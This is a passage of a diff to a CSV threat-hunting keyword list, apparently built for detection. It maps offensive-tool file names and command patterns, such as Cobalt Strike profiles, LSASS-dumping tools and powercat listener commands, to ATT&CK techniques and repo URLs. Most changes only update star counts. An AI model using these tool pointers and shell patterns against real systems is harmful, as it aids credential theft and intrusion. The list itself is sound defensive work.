- T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*post_ex_spawnto_x86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*POST_EXPLOIT_DIR*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*post_exploitation.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39264","4347","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*post_exploitation.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" "*PostDump.exe *","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z" "*POSTDump-main*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z" -"*postgres_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*postgres_default_user.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*postgres_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*postgres_default_user.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*PostMulitDomainSpider.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*PostMulitMsfGetDomainInfoByBloodHound.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*PostPowershellPowerViewAddNetUser.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" @@ -14914,31 +15082,31 @@ "*PostRewMsfPostConfInfos.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*PotatoTrigger.cpp*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*PotatoTrigger.cpp*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" -"*PowerBreach.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*PowerBruteLogon.*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","112","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z" +"*PowerBreach.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*PowerBruteLogon.*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","113","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z" "*powercat -c * -p *","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*powercat -l -p 4444*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*Powercat.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" -"*powerdump.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*powerdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*powerdump.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*powerdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*PowerExtract-main.zip*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" -"*PowerForensics*","offensive_tool_keyword","PowerForensics","The purpose of PowerForensics is to provide an all inclusive framework for hard drive forensic analysis. PowerForensics currently supports NTFS and FAT file systems. and work has begun on Extended File System and HFS+ support.","T1003 - T1039 - T1046 - T1057","TA0005 - TA0007 - TA0010","N/A","N/A","Information Gathering","https://github.com/Invoke-IR/PowerForensics","1","1","N/A","N/A","10","1324","285","2022-05-20T14:43:10Z","2015-03-07T17:12:19Z" +"*PowerForensics*","offensive_tool_keyword","PowerForensics","The purpose of PowerForensics is to provide an all inclusive framework for hard drive forensic analysis. PowerForensics currently supports NTFS and FAT file systems. and work has begun on Extended File System and HFS+ support.","T1003 - T1039 - T1046 - T1057","TA0005 - TA0007 - TA0010","N/A","N/A","Information Gathering","https://github.com/Invoke-IR/PowerForensics","1","1","N/A","N/A","10","1324","286","2022-05-20T14:43:10Z","2015-03-07T17:12:19Z" "*powerglot.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*powerkatz.dll*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" -"*powerkatz_x64.dll*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*powerkatz_x86.dll*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*PowerLessShell*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1393","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" -"*PowerLessShell.py*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1393","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" -"*powermad.ps1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1021","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" -"*Powermad.psd1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1021","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" -"*Powermad.psm1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1021","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" -"*Powermad-master*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1021","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" +"*powerkatz_x64.dll*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*powerkatz_x86.dll*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*PowerLessShell*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1395","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" +"*PowerLessShell.py*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1395","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" +"*powermad.ps1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" +"*Powermad.psd1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" +"*Powermad.psm1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" +"*Powermad-master*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" "*PowerMemory*","offensive_tool_keyword","PowerMemory","Exploit the credentials present in files and memory","T1003 - T1555 - T1213 - T1558","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/giMini/PowerMemory","1","0","N/A","N/A","9","819","219","2023-05-25T17:58:53Z","2015-08-29T17:09:23Z" "*PowerOPS*","offensive_tool_keyword","PowerOPS","PowerOPS is an application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a powershell runspace environment (.NET). It intends to include multiple offensive PowerShell modules to make the process of Post Exploitation easier.","T1059 - T1027 - T1053 - T1129 - T1086","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/fdiskyou/PowerOPS","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powerpick -Command *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*powerpick.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*PowerPick.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and 